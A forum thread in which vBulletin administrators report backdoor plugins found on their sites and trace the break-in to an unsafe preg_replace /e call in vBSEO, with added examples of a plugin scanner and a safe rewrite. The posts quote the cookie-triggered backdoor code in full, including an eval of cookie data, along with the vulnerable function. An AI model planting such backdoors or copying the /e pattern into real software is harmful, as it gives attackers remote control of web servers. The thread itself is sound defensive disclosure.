Possible Exploit

  • Jafo
    Senior Member
    • Apr 2004
    • 278

    Possible Exploit

    I noticed this plugin in global complete on several of our sites:

    PHP Code:
    /* vBulletin Templates Cookie Caching */
    $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
    I googled the phrase "vBulletin Templates Cookie Caching" and see someone else noticed it yesterday too:



    All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..
  • Jafo
    Senior Member
    • Apr 2004
    • 278

    #2
    Actually I more... This one in the same hook location, different site:

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    I also saw this code:

    Code:
    /* vBulletin Dynamic Menu Filters */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

    Comment

    • Jafo
      Senior Member
      • Apr 2004
      • 278

      #3
      I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.

      Comment

      • Jafo
        Senior Member
        • Apr 2004
        • 278

        #4
        I just found it on a latest version of vb 4 too..

        Comment

        • Jafo
          Senior Member
          • Apr 2004
          • 278

          #5
          Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..

          Comment

          • BirdOPrey5
            Senior Member
            • Jul 2008
            • 9613
            • 5.6.3

            #6
            Have you notified VBSEO?

            Comment

            • Jafo
              Senior Member
              • Apr 2004
              • 278

              #7
              Yes I have, and pointed them to this thread..

              Comment

              • Jafo
                Senior Member
                • Apr 2004
                • 278

                #8
                Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!

                Comment

                • DigitalCrowd
                  Senior Member
                  • Aug 2000
                  • 111
                  • 3.6.x

                  #9
                  I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However, a few sites, all with vBSEO, have them. One site had a "test" plugin for ajax_complete and it referenced:

                  eval($_COOKIE['c']);

                  Here is a site that references a PHP compromise with similar code...

                  Comment
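Added example, not code from this thread, vBulletin or vBSEO: a PHP CLI check that runs the patterns seen in posts #1, #2 and #9 (a regex capture called as a function name, eval() fed from a cookie, the marker comments) over plugin rows. The rows below are constructed from the snippets quoted above plus one benign plugin that legitimately reads a cookie; the `plugin` table and column names in the comment are recalled from the vBulletin 3.x schema and should be verified against your own install.

```php
<?php
// Added example, not code from this thread, vBulletin or vBSEO: a CLI check
// that scans plugin PHP for the cookie-driven backdoor patterns quoted in
// posts #1, #2 and #9.
//
// The rows below are constructed from the snippets quoted in the thread plus
// one benign plugin that legitimately reads a cookie. In a real check pull
// them from the database, roughly:
//   SELECT pluginid, product, hookname, title, phpcode, active FROM plugin
// (table and column names as recalled from the vBulletin 3.x schema; check
// them against your own install before relying on the query).

const RISK_INDICATORS = [
    // a regex capture used as a function name and called: $m[2]($m[3])
    'capture_called_as_function' => '/\$[A-Za-z_]\w*\[\d+\]\s*\(/',
    // eval() with request data inside the same statement
    'eval_of_request_data'       => '/\beval\s*\([^;]*\$_(COOKIE|GET|POST|REQUEST)\b/',
    // comment headers carried by the injected plugins in this thread
    'known_marker_comment'       => '/vBulletin Templates Cookie Caching|vBCMS Global Thread Cache|vBulletin Dynamic Menu Filters/',
];

// Lower-signal context: the plugin reads request data at all. Many honest
// plugins do, so it is only reported alongside one of the indicators above.
const REQUEST_READ = '/\$_(COOKIE|GET|POST|REQUEST)\s*\[/';

// Returns the names of the indicators that match one plugin's code.
function scan_plugin_code(string $phpcode): array
{
    $hits = [];
    foreach (RISK_INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $phpcode) === 1) {
            $hits[] = $name;
        }
    }
    if ($hits !== [] && preg_match(REQUEST_READ, $phpcode) === 1) {
        $hits[] = 'reads_request_data';
    }
    return $hits;
}

// Returns only the rows that matched, each with its indicator list.
function scan_plugins(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        $hits = scan_plugin_code($row['phpcode']);
        if ($hits !== []) {
            $flagged[] = [
                'pluginid'   => $row['pluginid'],
                'hookname'   => $row['hookname'],
                'title'      => $row['title'],
                'indicators' => $hits,
            ];
        }
    }
    return $flagged;
}

// Constructed rows: 101-103 are the snippets quoted in the thread, 104 is a
// harmless plugin that only reads a style cookie.
$rows = [
    ['pluginid' => 101, 'hookname' => 'global_complete', 'title' => 'vBulletin Templates Cookie Caching',
     'phpcode' => '/* vBulletin Templates Cookie Caching */ $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);'],
    ['pluginid' => 102, 'hookname' => 'global_complete', 'title' => 'vBCMS Global Thread Cache',
     'phpcode' => '/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);'],
    ['pluginid' => 103, 'hookname' => 'ajax_complete', 'title' => 'test',
     'phpcode' => 'eval($_COOKIE[\'c\']);'],
    ['pluginid' => 104, 'hookname' => 'global_start', 'title' => 'constructed benign plugin',
     'phpcode' => 'if (isset($_COOKIE["bbstyleid"])) { $styleid = intval($_COOKIE["bbstyleid"]); }'],
];

foreach (scan_plugins($rows) as $f) {
    printf("plugin %d on %s (\"%s\"): %s\n",
        $f['pluginid'], $f['hookname'], $f['title'], implode(', ', $f['indicators']));
}
```

Run with `php scan_plugins.php` (any file name). The three rows taken from the thread are reported with their indicators; the benign cookie-reading plugin is not, because reading `$_COOKIE` on its own is only reported next to a stronger signal. Treat a hit as a reason to inspect the row and the server logs around the time it was created, not as proof by itself.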

                  • Ace
                    Senior Member
                    • Apr 2004
                    • 4051
                    • 4.2.X

                    #10
                    If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.

                    How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.
                    My Live vB5 Site - NZEating.com
                    vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                    Comment

                    • Jafo
                      Senior Member
                      • Apr 2004
                      • 278

                      #11
                      Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down...

                      Comment

                      • Ace
                        Senior Member
                        • Apr 2004
                        • 4051
                        • 4.2.X

                        #12
                        OK. Best of luck figuring it out, I'm watching your ticket with great interest.

                        <-- works there.
                        My Live vB5 Site - NZEating.com
                        vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                        Comment

                        • Jafo
                          Senior Member
                          • Apr 2004
                          • 278

                          #13
                          Here it is folks, in functions_vbseocp_abstract.php

                          PHP Code:
                          public static function proc_deutf($ptxt, $tocharset)
                          {
                              $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
                              return $ptxt;
                          }

                          I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

                          PHP Code:
                          public static function proc_deutf($ptxt, $tocharset)
                          {
                              $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
                              return $ptxt;
                          }

                          Last edited by Jafo; Mon 23 Jan '12, 7:32am.

                          Comment
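Added example, not vBSEO's code and not the patch posted above: the same function rewritten with `preg_replace_callback`. The root problem in the quoted code is the `/e` modifier, under which `preg_replace` substitutes the captures into the replacement string and then evaluates that string as PHP, so the text inside the quoted key becomes part of a PHP expression. Changing the quoting around `$1` narrows that, but the replacement is still evaluated; a callback receives the captures as plain strings and builds no code from them. (`/e` was deprecated in PHP 5.5 and removed in PHP 7.0, so this rewrite is needed on current PHP anyway.) The behaviour assumed here is the one the original expresses: convert each quoted key before `=>` from UTF-8 to `$tocharset`, keeping the raw key when `iconv` fails.

```php
<?php
// Added example, not vBSEO's code: proc_deutf() without the /e modifier.
// The original spliced the capture $1 into a PHP expression that preg_replace
// then evaluated; preg_replace_callback hands the captures to a closure as
// plain strings and nothing is evaluated.
//
// Assumed behaviour, taken from the original: for each quoted array key
// followed by "=>", convert the key from UTF-8 to $tocharset and keep the
// original text when iconv fails.

function proc_deutf(string $ptxt, string $tocharset): string
{
    return preg_replace_callback(
        '#\'([^\']*)(\'\s*\=\>)#mi',           // same pattern, /e dropped
        static function (array $m) use ($tocharset): string {
            $converted = iconv('UTF-8', $tocharset, $m[1]);
            // same truthiness test as the original: fall back to the raw key
            $key = $converted ?: $m[1];
            return "'" . $key . stripslashes($m[2]);
        },
        $ptxt
    );
}

// Demo on constructed input: a UTF-8 key is converted (é becomes the single
// byte 0xE9 in ISO-8859-1), while a key containing quotes and a dollar sign
// is carried through as text rather than being interpreted.
$samples = [
    "array('café' => 1)",
    "array('say \"hi\" to \$user' => 2)",
];
foreach ($samples as $s) {
    $out = proc_deutf($s, 'ISO-8859-1');
    // addcslashes prints the non-ASCII byte as an octal escape so the
    // output stays readable on a UTF-8 terminal
    echo ($out === $s ? 'unchanged: ' : 'converted: '),
         addcslashes($out, "\x80..\xff"), "\n";
}
```

The first sample prints as `converted: array('caf\351' => 1)`; the second is unchanged, because the closure only ever treats `$m[1]` as data. If `proc_deutf` is a static method in the class as in the original, the closure and signature move inside unchanged.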

                          • briansol
                            Senior Member
                            • Apr 2006
                            • 674
                            • 3.6.x

                            #14
                            Title replaces happen real-time as the page is pulled. These are not stored anywhere.

                            I highly suggest checking your server logs for more detailed information or entries relating to product changes.

                            Comment

                            • Jafo
                              Senior Member
                              • Apr 2004
                              • 278

                              #15
                              briansol, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.

                              Comment
